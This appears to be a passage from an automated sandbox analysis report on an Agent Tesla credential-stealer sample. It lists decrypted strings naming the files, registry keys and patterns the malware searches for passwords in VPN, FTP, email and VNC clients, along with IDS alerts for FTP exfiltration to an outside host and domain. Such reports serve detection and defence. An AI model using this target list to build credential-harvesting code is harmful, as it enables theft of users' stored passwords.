                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Private Internet Access
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \account.json
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Private Internet Access
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: FileZilla
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Server>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Host>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Host>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </Host>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Port>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </Port>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <User>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <User>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </User>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </Pass>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Pass>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </Pass>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: CoreFTP
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: User
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Host
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Port
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: WinSCP
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: HostName
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UserName
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PublicKeyFile
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PortNumber
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: WinSCP
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ABCDEF
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Flash FXP
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: port
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: user
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pass
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: quick.dat
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Sites.dat
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \FlashFXP\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \FlashFXP\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: FTP Navigator
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SystemDrive
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: No Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: User
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmartFTP
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: WS_FTP
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: appdata
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: HOST
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PWD=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PWD=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: FtpCommander
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SystemDrive
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SystemDrive
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SystemDrive
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;Password=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;User=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;Server=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;Port=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;Port=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;Password=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;User=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ;Anonymous=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: FTPGetter
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server_ip>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server_ip>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </server_ip>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server_port>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </server_port>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server_user_name>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server_user_name>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </server_user_name>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server_user_password>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <server_user_password>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </server_user_password>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: FTPGetter
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: The Bat!
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: appdata
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \The Bat!
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Account.CFN
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Account.CFN
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Becky!
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: DataDir
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Folder.lst
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Account
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PassWd
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Account
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SMTPServer
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Account
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: MailAddress
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Becky!
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Outlook
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Email
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IMAP Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: POP3 Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: HTTP Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SMTP Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Email
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Email
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Email
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IMAP Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: POP3 Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: HTTP Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SMTP Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Mail App
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Email
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SchemaId
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pResourceElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pIdentityElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pPackageSid
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: syncpassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: mailoutgoing
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: FoxMail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Executable
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: FoxmailPath
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Storage\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Storage\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Account.stg
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Account.stg
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: POP3Host
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SMTPHost
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IncomingServer
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Account
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: MailAddress
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: POP3Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Opera Mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: opera:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PocoMail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: appdata
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Email
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: POPPass
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SMTPPass
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SMTP
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: eM Client
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: eM Client
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Accounts
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: "Username":"
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: "Secret":"
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: "ProviderName":"
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Mailbird
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SenderIdentities
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Accounts
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Server_Host
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Accounts
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Email
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Username
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: EncryptedPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Mailbird
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: TightVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: TightVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ControlPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: TigerVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passwd
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passwd2
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passwd
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passwd2
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passwd
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passwd2
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passwd
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UltraVNC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: Xc501VOacR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Xc501VOacR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49839 -> 162.241.203.30:31261
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49830 -> 162.241.203.30:21
                        Source: global trafficTCP traffic: 192.168.2.5:49839 -> 162.241.203.30:31261
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewASN Name: OIS1US OIS1US
                        Source: unknownFTP traffic detected: 162.241.203.30:21 -> 192.168.2.5:49830 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 13:23. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 13:23. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 13:23. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.aminhacorretora.com.br
                        Source: Xc501VOacR.exe, 00000000.00000002.2704584943.00000000061D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c0/
                        Source: InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078CBC58 CreateProcessAsUserW,0_2_078CBC58
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_01250A780_2_01250A78
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_012513D80_2_012513D8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_02CD84D80_2_02CD84D8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_02CD147E0_2_02CD147E
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_02CD1B080_2_02CD1B08
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_02CD7D700_2_02CD7D70
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_02CDCE000_2_02CDCE00
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0535D5EC0_2_0535D5EC
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0535F3E00_2_0535F3E0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0535F3D10_2_0535F3D1
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_060116A70_2_060116A7
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_060138570_2_06013857
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747CF080_2_0747CF08
